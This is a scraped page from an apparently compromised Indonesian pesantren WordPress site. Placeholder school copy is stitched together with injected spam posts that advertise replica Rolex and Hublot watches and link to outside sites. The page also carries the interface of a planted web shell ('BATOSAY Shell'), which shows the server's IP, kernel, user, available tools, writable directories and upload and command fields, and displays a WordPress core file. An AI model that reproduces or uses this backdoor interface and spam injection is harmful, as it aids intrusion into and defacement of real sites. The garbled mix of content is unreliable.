Pondok Pesantren Tahfizul Qur'an

Menginspirasi Masa Depan, Menyambut Dunia Baru

Selamat datang di [Nama Sekolah]. Kami adalah sekolah yang berdedikasi untuk membentuk para pemimpin masa depan yang berani dan inovatif. Di sini, kami meyakini bahwa setiap siswa adalah unik dan memiliki potensi tak terbatas untuk mencapai kesuksesan.

Slide 1 Heading
Lorem ipsum dolor sit amet consectetur adipiscing elit dolor
Click Here
Slide 2 Heading
Lorem ipsum dolor sit amet consectetur adipiscing elit dolor
Click Here
Slide 3 Heading
Lorem ipsum dolor sit amet consectetur adipiscing elit dolor
Click Here
Slide Heading
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.
Click Here

Selamat datang di Pesantren Insan Madani

Kami adalah sekolah yang berdedikasi untuk membentuk para pemimpin masa depan yang berani dan inovatif. Di sini, kami meyakini bahwa setiap siswa adalah unik dan memiliki potensi tak terbatas untuk mencapai kesuksesan.

0
Siswa
0
Kota
0
Provinsi
0
Ruang Kelas
0
Ruang Asrama
0
Mushola

Keunggulan Sekolah Kami:

Kurikulum Terbaik:

Kami menawarkan kurikulum terbaik yang berfokus pada pembelajaran holistik, mengintegrasikan pengetahuan akademis dengan keterampilan hidup yang praktis.

Guru Berpengalaman:

Staf pengajar kami adalah para ahli di bidangnya, yang berdedikasi untuk mendukung perkembangan penuh potensi setiap siswa.

Fasilitas Modern:

[Nama Sekolah] dilengkapi dengan fasilitas modern dan teknologi mutakhir untuk menciptakan lingkungan belajar yang inovatif dan inspiratif.

Pengembangan Karakter:

Kami mendorong siswa untuk menjadi individu yang tangguh, berempati, dan bertanggung jawab, sehingga mereka siap menghadapi tantangan masa depan.

Kegiatan Ekstrakurikuler:

1. Klub Seni dan Kreativitas:

Terdiri dari Klub Seni Lukis, Klub Seni Kerajinan Tangan, Klub Teater dan Drama Klub Fotografi

2. Klub Olahraga:

Terdiri dari Tim Sepak Bola, Tim Bola Basket, Tim Bulu Tangkis, Klub Renang, dan Tim Atletik

3. Klub Musik dan Tari:

Terdiri dari: Band Sekolah, Paduan Suara, Kelompok Tari Tradisional dan Kelompok Tari Modern

5. Klub Ilmu Pengetahuan dan Teknologi:

Terdiri dari: Klub Sains Eksperimen, Klub Koding dan Robotika, Klub Astronomi dan Klub Ilmu Pengetahuan Alam

Testimoni:

"Saya merasa sangat beruntung bisa mengenyam pendidikan di pesantren ini. Lingkungan yang khusyuk dan pengajar yang berdedikasi membuat saya semakin dekat dengan agama dan mendalami ilmu-ilmu keislaman. Selain itu, suasana kekeluargaan di pesantren ini membuat saya merasa seperti berada di rumah kedua. Terima kasih kepada semua pengajar dan teman-teman seperjuangan!"

Ahmad, LC Alumni

"Saya awalnya ragu untuk memilih pesantren sebagai jalur pendidikan, tetapi sejak bergabung di sini, semua keraguan itu hilang. Pesantren ini tidak hanya memberikan pendidikan agama yang mendalam, tetapi juga membantu saya mengembangkan soft skill dan kepemimpinan melalui berbagai kegiatan ekstrakurikuler. Saya benar-benar merasa terbentuk menjadi pribadi yang lebih baik."

Budianto, Mpd Designation

"Pesantren ini memberikan pendidikan holistik yang tidak hanya fokus pada aspek keagamaan, tetapi juga pada pembentukan karakter dan etika. Saya merasa lebih berempati, lebih disiplin, dan memiliki rasa tanggung jawab yang lebih tinggi setelah menghabiskan waktu di sini. Pengalaman di pesantren ini akan selalu menjadi kenangan indah dalam hidup saya."

Tono Designation

Berita/ Artikel terbaru

Hublot replica watches

Looking for high quality replica watches? Check out www.thecomedypub.co.uk. Experience the stylish design and craftsmanship of Hublot replica watches at a fraction of

Selengkapnya >>

Order Replica watches UK

Rolexreplicauk.me offers exquisite replica Siwss made rolex watches that are meticulously crafted with great attention to detail. Order Replica watches UK at http://www.gwyneddsands.co.uk/aboutus.htm.

Selengkapnya >>

shop for gents and ladies

Newest Swiss rolex replica uk online shop for gents and ladies. Newest Swiss Rolex replica watches uk online shop for gents and ladies. Browse

Selengkapnya >>

Partner Kerjasama:

Map Sekolah:

Butuh bantuan?
BaToSay Shell
BATOSAY Shell
Server IP : 45.126.43.27  /  Your IP : 13.58.105.121
Web Server : LiteSpeed
System : Linux serv02.awandns.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
User : annurindonesia ( 1064)
PHP Version : 7.4.33
Disable Function : exec,system,passthru,shell_exec,dl,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/annurindonesia/public_html/wp-includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/annurindonesia/public_html/wp-includes/class-wp-block-supports.php
<?php
/**
 * Block support flags.
 *
 * @package WordPress
 *
 * @since 5.6.0
 */

/**
 * Class encapsulating and implementing Block Supports.
 *
 * @since 5.6.0
 *
 * @access private
 */
#[AllowDynamicProperties]
class WP_Block_Supports {

	/**
	 * Config.
	 *
	 * @since 5.6.0
	 * @var array
	 */
	private $block_supports = array();

	/**
	 * Tracks the current block to be rendered.
	 *
	 * @since 5.6.0
	 * @var array
	 */
	public static $block_to_render = null;

	/**
	 * Container for the main instance of the class.
	 *
	 * @since 5.6.0
	 * @var WP_Block_Supports|null
	 */
	private static $instance = null;

	/**
	 * Utility method to retrieve the main instance of the class.
	 *
	 * The instance will be created if it does not exist yet.
	 *
	 * @since 5.6.0
	 *
	 * @return WP_Block_Supports The main instance.
	 */
	public static function get_instance() {
		if ( null === self::$instance ) {
			self::$instance = new self();
		}

		return self::$instance;
	}

	/**
	 * Initializes the block supports. It registers the block supports block attributes.
	 *
	 * @since 5.6.0
	 */
	public static function init() {
		$instance = self::get_instance();
		$instance->register_attributes();
	}

	/**
	 * Registers a block support.
	 *
	 * @since 5.6.0
	 *
	 * @link https://developer.wordpress.org/block-editor/reference-guides/block-api/block-supports/
	 *
	 * @param string $block_support_name   Block support name.
	 * @param array  $block_support_config Array containing the properties of the block support.
	 */
	public function register( $block_support_name, $block_support_config ) {
		$this->block_supports[ $block_support_name ] = array_merge(
			$block_support_config,
			array( 'name' => $block_support_name )
		);
	}

	/**
	 * Generates an array of HTML attributes, such as classes, by applying to
	 * the given block all of the features that the block supports.
	 *
	 * @since 5.6.0
	 *
	 * @return string[] Array of HTML attribute values keyed by their name.
	 */
	public function apply_block_supports() {
		$block_type = WP_Block_Type_Registry::get_instance()->get_registered(
			self::$block_to_render['blockName']
		);

		// If no render_callback, assume styles have been previously handled.
		if ( ! $block_type || empty( $block_type ) ) {
			return array();
		}

		$block_attributes = array_key_exists( 'attrs', self::$block_to_render ) && is_array( self::$block_to_render['attrs'] )
			? self::$block_to_render['attrs']
			: array();

		$output = array();
		foreach ( $this->block_supports as $block_support_config ) {
			if ( ! isset( $block_support_config['apply'] ) ) {
				continue;
			}

			$new_attributes = call_user_func(
				$block_support_config['apply'],
				$block_type,
				$block_attributes
			);

			if ( ! empty( $new_attributes ) ) {
				foreach ( $new_attributes as $attribute_name => $attribute_value ) {
					if ( empty( $output[ $attribute_name ] ) ) {
						$output[ $attribute_name ] = $attribute_value;
					} else {
						$output[ $attribute_name ] .= " $attribute_value";
					}
				}
			}
		}

		return $output;
	}

	/**
	 * Registers the block attributes required by the different block supports.
	 *
	 * @since 5.6.0
	 */
	private function register_attributes() {
		$block_registry         = WP_Block_Type_Registry::get_instance();
		$registered_block_types = $block_registry->get_all_registered();
		foreach ( $registered_block_types as $block_type ) {
			if ( ! ( $block_type instanceof WP_Block_Type ) ) {
				continue;
			}
			if ( ! $block_type->attributes ) {
				$block_type->attributes = array();
			}

			foreach ( $this->block_supports as $block_support_config ) {
				if ( ! isset( $block_support_config['register_attribute'] ) ) {
					continue;
				}

				call_user_func(
					$block_support_config['register_attribute'],
					$block_type
				);
			}
		}
	}
}

/**
 * Generates a string of attributes by applying to the current block being
 * rendered all of the features that the block supports.
 *
 * @since 5.6.0
 *
 * @param string[] $extra_attributes Optional. Array of extra attributes to render on the block wrapper.
 * @return string String of HTML attributes.
 */
function get_block_wrapper_attributes( $extra_attributes = array() ) {
	$new_attributes = WP_Block_Supports::get_instance()->apply_block_supports();

	if ( empty( $new_attributes ) && empty( $extra_attributes ) ) {
		return '';
	}

	// This is hardcoded on purpose.
	// We only support a fixed list of attributes.
	$attributes_to_merge = array( 'style', 'class', 'id' );
	$attributes          = array();
	foreach ( $attributes_to_merge as $attribute_name ) {
		if ( empty( $new_attributes[ $attribute_name ] ) && empty( $extra_attributes[ $attribute_name ] ) ) {
			continue;
		}

		if ( empty( $new_attributes[ $attribute_name ] ) ) {
			$attributes[ $attribute_name ] = $extra_attributes[ $attribute_name ];
			continue;
		}

		if ( empty( $extra_attributes[ $attribute_name ] ) ) {
			$attributes[ $attribute_name ] = $new_attributes[ $attribute_name ];
			continue;
		}

		$attributes[ $attribute_name ] = $extra_attributes[ $attribute_name ] . ' ' . $new_attributes[ $attribute_name ];
	}

	foreach ( $extra_attributes as $attribute_name => $value ) {
		if ( ! in_array( $attribute_name, $attributes_to_merge, true ) ) {
			$attributes[ $attribute_name ] = $value;
		}
	}

	if ( empty( $attributes ) ) {
		return '';
	}

	$normalized_attributes = array();
	foreach ( $attributes as $key => $value ) {
		$normalized_attributes[] = $key . '="' . esc_attr( $value ) . '"';
	}

	return implode( ' ', $normalized_attributes );
}

Batosay - 2023
IDNSEO Team